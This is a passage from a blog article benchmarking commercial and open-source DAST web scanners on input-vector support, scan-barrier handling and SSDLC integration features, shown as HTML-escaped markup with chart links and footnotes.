&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;u&gt;3. Benchmark Results&lt;/u&gt;&lt;/span&gt;&lt;/h2&gt;
The following sections cover the results of the feature comparisons and accuracy benchmarks of the various tools assessed.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;FAQ&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
1) Why do the results &lt;b&gt;&lt;span style=&quot;color: yellow;&quot;&gt;differ &lt;/span&gt;&lt;/b&gt;from previous benchmarks?&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #404040; border: solid windowtext 1.0pt; mso-background-themecolor: text1; mso-background-themetint: 191; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 431.5pt;&quot; valign=&quot;top&quot; width=&quot;575&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
The results in the various charts represent an &lt;b&gt;aggregated &lt;/b&gt;score of &lt;b&gt;four
  input vectors (GET/POST/XML/JSON)&lt;/b&gt;, as &lt;b&gt;opposed&lt;/b&gt; to previous
  benchmark which only included two input vectors (GET/POST).&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
The newly
  implemented test cases are only covered for the relevant attack vectors (e.g.
  attacks that can be executed via JSON/XML POST requests) such as LFI/RFI/Etc.,
  and not for (mostly) irrelevant attack vectors (XSS/Unvalidated-Redirect/Backup-Files).&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.1 Input Delivery Vector Support (Updated)&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
The term &quot;input delivery vector&quot;, or rather input delivery format, refers to the structure of inputs being used in the client-server communication to deliver values from the browser/mobile/client-application to the web server.&lt;br /&gt;
Examples can include query-string embedded parameters (GET), HTTP body parameters (POST), JSON arrays in the HTTP body (JSON), and so on.&lt;br /&gt;
&lt;br /&gt;
Since the ability to parse, analyze and simulate attacks in &lt;b&gt;input delivery vectors&lt;/b&gt; is key to weather or not DAST scanners will be able to identify vulnerabilities relevant to the parameter,&amp;nbsp; I still consider the scanner&#39;s &lt;b&gt;support &lt;/b&gt;for the tested application input delivery method to be the &lt;b&gt;single MOST significant aspect&lt;/b&gt; in the selection process of any scanner.&lt;br /&gt;
&lt;br /&gt;
Although it&#39;s not necessary to support every possible input delivery vector, the scanner should be able to scan the prominent input vectors used in the application to be effective.&lt;br /&gt;
&lt;br /&gt;
The following table presents a prominent vector-support comparison between commercial DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl5zaKOW45odm3WksZwj0kTs4ZyIUMmJlgCWlPwZ1yFNIDzX03tCmF_KxGwVJfG6gJvDQ8fqRa8BsNfIdHWnA3iNccp5IGSeL8HurrdlCh07Wp93GtbkXoEJ-44B1pZjrzkRMvSh2KUkc/s1600/WAVSEP-InputVectorSupport-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl5zaKOW45odm3WksZwj0kTs4ZyIUMmJlgCWlPwZ1yFNIDzX03tCmF_KxGwVJfG6gJvDQ8fqRa8BsNfIdHWnA3iNccp5IGSeL8HurrdlCh07Wp93GtbkXoEJ-44B1pZjrzkRMvSh2KUkc/s640/WAVSEP-InputVectorSupport-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;burp-suite&lt;/b&gt; requires changing the default &lt;b&gt;&lt;a href=&quot;https://support.portswigger.net/customer/portal/questions/15908480-how-to-re-enable-amf-support&quot; target=&quot;_blank&quot;&gt;configuration&lt;/a&gt;&lt;/b&gt; for effective AMF scan support&lt;br /&gt;*&amp;nbsp;&lt;b&gt;burp-suite&lt;/b&gt;&amp;nbsp;requires the &quot;&lt;a href=&quot;https://portswigger.net/bappstore/bapps/details/a0740678763a4c748bbe7c79151cbe00&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;GWT Insertion Points&lt;/b&gt;&lt;/a&gt;&quot; extension for effective GWT scan support&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
The following table presents a  prominent vector-support comparison between open source DAST tools:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlANkokyOqhd1Y4vemmEpitDbhs3byMI4CLFHaHEiuZRf5BOw6wGFGVlgyZ7cC697DQ7VSALYu00PMx1ZXTweryaY_vs4od995kLQ7yzOXMn-g0b-wydBpeii_Yv_gUh0NUMutYeHi6w/s1600/InputVectorSupport-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlANkokyOqhd1Y4vemmEpitDbhs3byMI4CLFHaHEiuZRf5BOw6wGFGVlgyZ7cC697DQ7VSALYu00PMx1ZXTweryaY_vs4od995kLQ7yzOXMn-g0b-wydBpeii_Yv_gUh0NUMutYeHi6w/s640/InputVectorSupport-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;zap&lt;/b&gt; effective support of AMF scanning is unclear (a &lt;a href=&quot;https://wiki.mozilla.org/Security/Mentorships/MWoS/2014/OWASP_ZAP_AMF_Support&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: blue;&quot;&gt;project&lt;/span&gt;&lt;/b&gt;&lt;/a&gt; was initiated) and requires the installation of an optional &quot;AMF&quot; plugin from the store&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;w3af&lt;/b&gt; has open and active projects to develop support for REST API/JSON and AMF support. Unknown schedule/release date.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* Bugs in &lt;b&gt;IronWASP&lt;/b&gt; JSON/XML support prevent it from effectively parsing and scanning JSON/XML inputs.May be related to improper content-types.&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Although the interpretation of the results is left to the reader, it&#39;s important to note that lack of support for prominent input vectors limits the capabilities of scanners in relevant test scenarios, particularly in various &lt;b&gt;payload injection&lt;/b&gt; tests.&lt;br /&gt;
&lt;br /&gt;
The definition of &lt;b&gt;prominent input vectors&lt;/b&gt; changes between applications, and require the tester to &quot;profile&quot; the input vectors in use in the application, to &lt;b&gt;identify &lt;/b&gt;the input formats &lt;b&gt;crucial &lt;/b&gt;for scanners to support.&lt;br /&gt;
&lt;br /&gt;
It is well worth mentioning that &lt;b&gt;burp-suite,&lt;/b&gt;&amp;nbsp;&lt;b&gt;zap, ironwasp&lt;/b&gt;&amp;nbsp;and &lt;b&gt;arachni&lt;/b&gt; (and in theory, other tools with fuzz testing capabilities) support &lt;b&gt;custom&lt;/b&gt; input vectors (e.g. scanning ANY part of the protocol) - typically by configuring specific sections in HTTP requests (useful for limited testing of &quot;unsupported&quot; delivery methods). Furthermore,&amp;nbsp;&lt;b&gt;burp-suite &lt;/b&gt;and&amp;nbsp;&lt;b&gt;zap&lt;/b&gt;&amp;nbsp;seem to support scanning/testing raw &lt;b&gt;websockets (e.g. scanning non-HTTP protocols)&lt;/b&gt;, which might be useful for certain assessments.&lt;br /&gt;
&lt;br /&gt;
To my best knowledge currently only&amp;nbsp;&lt;b&gt;zap&lt;/b&gt;&amp;nbsp;supports out-of-the-box scanning of odata-id vectors (with webinspect planning support it upcoming publications), while DOM related vectors were not evaluated in this article for any of the contenders.&lt;br /&gt;
&lt;br /&gt;
Full charts will be available in the upcoming update to &lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot; target=&quot;_blank&quot;&gt;STM&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.2 Support for Overcoming Modern Scan Barriers (Altered)&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
Ever tried to run a scanner against a website, and it &quot;just didn&#39;t work&quot; ?&lt;br /&gt;
Apart from the lack of support of relevant input vectors (JSON/XML/etc), or an ineffective crawling mechanism, there&#39;s additional &quot;barriers&quot; that can prevent a scanner from successfully testing a target.&lt;br /&gt;
&lt;br /&gt;
Support for replaying CSRF parameters/headers, support for including multiple domains in the scope of a single scan (&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;crucial &lt;/b&gt;&lt;/span&gt;for SPA micro service architecture), and similar key elements are required to successfully scan &lt;b&gt;modern applications&lt;/b&gt;, particularly in the context of periodic BDD/TDD assessments.&lt;br /&gt;
&lt;br /&gt;
The following table compares the scan barrier support of commercial DAST scanners:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqGVSXL1fgycePROV8F__TFrIDJo1-nXKh47bu0NJTKV8N6CVsINf1paYp43g3mEczyDYkK1ByaFsr5BVpqHVcoD8jsyZSlkGRDBCzcD8PbxkyVbqD1yb2uzwc2uKIrk2KFrOakQ_NHkQ/s1600/ScanBarrierSupport-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqGVSXL1fgycePROV8F__TFrIDJo1-nXKh47bu0NJTKV8N6CVsINf1paYp43g3mEczyDYkK1ByaFsr5BVpqHVcoD8jsyZSlkGRDBCzcD8PbxkyVbqD1yb2uzwc2uKIrk2KFrOakQ_NHkQ/s640/ScanBarrierSupport-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;burp-suite&lt;/b&gt; support for &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://portswigger.net/burp/help/options_sessions.html&quot; target=&quot;_blank&quot;&gt;recording/re-performing login&lt;/a&gt;&lt;/b&gt;&lt;/span&gt; / in-session detection currently relies on the &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://portswigger.net/burp/help/options_sessions_macroeditor.html&quot; target=&quot;_blank&quot;&gt;macro&lt;/a&gt;&lt;/b&gt;&lt;/span&gt; feature&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;burp-suite&lt;/b&gt; has de-facto support of SPA with multiple domains, due to the testers ability to include any domain in scope&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;burp-suite&lt;/b&gt; support anti-CSRF tokens via the &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://portswigger.net/bappstore/bapps/details/086c6af8b24c40a79a5e99b71df10f11&quot; target=&quot;_blank&quot;&gt;CSurfer&lt;/a&gt;&lt;/b&gt;&lt;/span&gt; extension or the &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://portswigger.net/burp/help/options_sessions_macroeditor.html&quot; target=&quot;_blank&quot;&gt;macro&lt;/a&gt;&lt;/b&gt;&lt;/span&gt; feature&lt;/span&gt; (Run a post-request macro)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;Acunetix &lt;/b&gt;support for multiple domains requires a set-up an additional Target and then adding the secondary Target as an &quot;Allowed Host&quot; to the first Target. &lt;br /&gt;&amp;nbsp;&amp;nbsp; (Targets &amp;gt; TARGET_NAME &amp;gt; Advanced &amp;gt; Enabling &quot;Allowed Hosts&quot; and picking the other Target you want to include as part of the scan)&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* The angular/react crawling support is based on vendor claims, and was not yet evaluated through a dedicated benchmark&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* Some 
of the missing features can be &quot;externally&quot; supported, by forwarding 
traffic through burpsuite/zap/fiddler &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;with &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://www.vanstechelman.eu/security/using_skipfish_through_burpsuite&quot; target=&quot;_blank&quot;&gt;auth/match-and-replace&lt;/a&gt;&lt;/b&gt;&lt;/span&gt; rules&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The following table compares the scan barrier support of open-source DAST scanners:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSox2OkFLMFLQ8uNU7InRi3Lva3ZRQhves1_T_Js_R8wV3cBMkI-MluMYMgmq6C8gauoyxNLSKK5sU3Hgw8KsERnWp3-ubApC-1_beBEI8o_WTFDI72T4auc_QUXccO4zZDPCHkcN_qrU/s1600/ScanBarrierSupport-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSox2OkFLMFLQ8uNU7InRi3Lva3ZRQhves1_T_Js_R8wV3cBMkI-MluMYMgmq6C8gauoyxNLSKK5sU3Hgw8KsERnWp3-ubApC-1_beBEI8o_WTFDI72T4auc_QUXccO4zZDPCHkcN_qrU/s640/ScanBarrierSupport-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;ZAP &lt;/b&gt;supports re-performing authentication via &lt;a href=&quot;https://www.youtube.com/watch?v=cR4gw-cPZOA&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;built-in&lt;/b&gt;&lt;/a&gt; authentication features and &lt;b&gt;&lt;a href=&quot;https://www.coveros.com/scripting-authenticated-login-within-zap-vulnerability-scanner/&quot; target=&quot;_blank&quot;&gt;zest scripts&lt;/a&gt;&lt;/b&gt;, as shown in the &lt;b&gt;&lt;a href=&quot;https://security.secure.force.com/security/tools/webapp/zaprunningscan&quot; target=&quot;_blank&quot;&gt;following article&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;Subgraph vega&lt;/b&gt; supports authentication recording via &lt;a href=&quot;https://github.com/subgraph/Vega/wiki/Identities&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;macros&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;Any scanner &lt;/b&gt;that has tree-view manual scan support can at least partially support scans of SPA with multiple domains&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* Some of the missing features can be &quot;externally&quot; supported, by forwarding traffic through burpsuite/zap/fiddler with &lt;b&gt;&lt;a href=&quot;https://www.vanstechelman.eu/security/using_skipfish_through_burpsuite&quot; target=&quot;_blank&quot;&gt;auth/match-and-replace&lt;/a&gt;&lt;/b&gt; rules&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;ZAP&lt;/b&gt;/&lt;b&gt;IronWASP &lt;/b&gt;angular/react crawling is possible only through browser based crawling (crawljax/etc). Requires configuration/dependencies.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;W3AF &lt;/b&gt;anti-CSRF plugin seems to be only partially implemented (&lt;a href=&quot;https://github.com/andresriancho/w3af/milestone/13&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;false-negatives&lt;/b&gt;&lt;/a&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.3 Support for Crucial SSDLC Integration Features (&lt;span style=&quot;color: yellow;&quot;&gt;New!&lt;/span&gt;)&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
As opposed to manual security assessments, and performance in detection accuracy tests aside, to be able to efficiently use DAST tools in SSDLC, the scanner typically needs to support several key features -&lt;br /&gt;
&lt;br /&gt;
Although &lt;b&gt;NOT all &lt;/b&gt;of the features &lt;b&gt;are required&lt;/b&gt; for each SSDLC integration, some can be useful or even necessary, depending on the process goals and requirements: &lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Defect Tracking Integration&lt;/u&gt;&lt;/b&gt; - support reporting &quot;vulnerabilities&quot; directly to defect tracking repositories such as JIRA/TFS/Bugzilla/Trac/etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Continuous Integration Support (BDD)&lt;/u&gt; &lt;/b&gt;- support for CLI/API/plugin-based scanning through external continues-integration / build-management software such as Jenkins. De-facto external support for scheduled scans.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Selenium Import/Integration (TDD)&lt;/u&gt;&lt;/b&gt; - importing crawling results or otherwise integrating with selenium scan scripts.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Periodic/Scheduled Scans&lt;/u&gt;&lt;/b&gt; - built-in scheduled scans (also possible through continues integration support through CLI/API/plugins)&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Periodic Results Gap Analysis&lt;/u&gt;&lt;/b&gt; - analyze and presents results diff between scans, or otherwise compare periodic scans.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;IAST Module Hybrid Analysis&lt;/u&gt;&lt;/b&gt; - although classified under different categories, some products have &lt;b&gt;both DAST &lt;span style=&quot;color: red;&quot;&gt;and &lt;/span&gt;IAST modules&lt;/b&gt;, and are further able to combine their results through scans in what is typically called Hybrid-Analysis, and integrate them in TDD/BDD scenarios. &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;SAST Module Hybrid Analysis&lt;/u&gt; &lt;/b&gt;- In a similar manner, either through collaboration or built-in features, some vendors (typically commercial) have &lt;b&gt;both DAST &lt;span style=&quot;color: red;&quot;&gt;and &lt;/span&gt;SAST modules&lt;/b&gt;, or are otherwise able to use &quot;hybrid-analysis&quot; with results of external SAST tools, potentially getting the &quot;best&quot; out of both worlds. DOM-focused SAST mechanisms were &lt;b&gt;NOT &lt;/b&gt;considered full SAST modules for the purpose of this article.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Extensibility&lt;/u&gt; &lt;/b&gt;- the ability to extend the scanner with custom plugins, tests and scripts.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;u&gt;&lt;b&gt;WAF Virtual Patch Generation&lt;/b&gt;&lt;/u&gt; - the ability to generate a virtual patch rule for a WAF out of scan results/vulnerabilities identified.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;u&gt;&lt;b&gt;Enterprise Console Management Features&lt;/b&gt;&lt;/u&gt; - the ability to manage results in a graphical user interface - view charts/lists, mark false positives, search, import, export and classify results, etc. A full check-mark is awarded to products with homegrown on-premise solutions (to support finance/defense sector closed networks), while a half-check-mark is awarded to cloud solutions that can be used &quot;indirectly&quot; to scan internal solutions and presents results in an enterprise-like console, or to solutions with 3rd party enterprise console integration (e.g. threadfix, seccubus, etc).&lt;/li&gt;
&lt;/ul&gt;
The comparison tables attempted to present &lt;b&gt;both&lt;/b&gt; the built-in support for features (full check-mark), and support through integration with 3rd party products (cross-check-mark).&lt;br /&gt;
&lt;br /&gt;
The following table presents a  comparison of built-in/external prominent SSDLC feature support in commercial DAST tools:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2gX5Hmcky7duVmwYEZiRcSgA4Ny0AVdehx7CGuzLs72FDGC3VCYhhAzWqRQKFORQewkl_EAvrZgLOnr-ooRqWEHBCsh_UbRR1t_EAAnKa6C-jAYM9FWcna5HsowTt6q3CMb0wSM2XA88/s1600/SSDLC-Feature-Support-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2gX5Hmcky7duVmwYEZiRcSgA4Ny0AVdehx7CGuzLs72FDGC3VCYhhAzWqRQKFORQewkl_EAvrZgLOnr-ooRqWEHBCsh_UbRR1t_EAAnKa6C-jAYM9FWcna5HsowTt6q3CMb0wSM2XA88/s640/SSDLC-Feature-Support-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;Comparison notes:&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #404040; border: solid windowtext 1.0pt; mso-background-themecolor: text1; mso-background-themetint: 191; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 431.5pt;&quot; valign=&quot;top&quot; width=&quot;575&quot;&gt;&amp;nbsp;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* 
SAST modules are typically included in 3rd party products and require 
additional costs. IAST modules (for whatever reason, and lucky for us) 
are typically included in the pricing of the commercial DAST web 
application scanner.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;*
 WAF virtual patching rule generation support is WAF specific and varies
 between vendors: Netsparker supports rule generation for ModSecurity, &lt;a href=&quot;https://www.acunetix.com/support/docs/wvs/managing-vulnerabilities/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Acunetix&lt;/b&gt;&lt;/a&gt; supports F5/Fortinet/Imperva, &lt;a href=&quot;https://www.rapid7.com/docs/AppSpider-Defend-Product-Brief.pdf&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;AppSpider&lt;/b&gt;&lt;/a&gt; supports &lt;/span&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;F5/Fortinet/Imperva/Akamai/DenyAll/ModSecurity/Barracuda,
 Appscan/Webinspect support virtual patch generation for various WAFs 
(missing list), and 3rd party interfaces such as Threadfix can create 
virtual patch rules for WAFs from the results of multiple supported 
scanners.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;/span&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;Usage 
of external management frameworks (&lt;a href=&quot;https://github.com/continuumsecurity/bdd-security&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;BDD-Security&lt;/b&gt;&lt;/a&gt;, &lt;b&gt;&lt;a href=&quot;https://www.seccubus.com/&quot; target=&quot;_blank&quot;&gt;Seccubus&lt;/a&gt;&lt;/b&gt;,&lt;b&gt; &lt;a href=&quot;https://www.threadfix.it/&quot; target=&quot;_blank&quot;&gt;ThreatFix&lt;/a&gt;&lt;/b&gt;, &lt;a href=&quot;https://github.com/OWASP/django-DefectDojo&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;DefectDojo&lt;/b&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.faradaysec.com/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Farady&lt;/b&gt;&lt;/a&gt;, 
&lt;a href=&quot;https://dradisframework.com/ce/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Dradis&lt;/b&gt;&lt;/a&gt;, &lt;b&gt;&lt;a href=&quot;https://jenkins.io/&quot; target=&quot;_blank&quot;&gt;Jenkis &lt;/a&gt;+ CLI&lt;/b&gt;) is able to &quot;compensate&quot; for &lt;b&gt;MANY&lt;/b&gt; of the missing 
SSDLC features of supported scanners, by parsing scanning reports and 
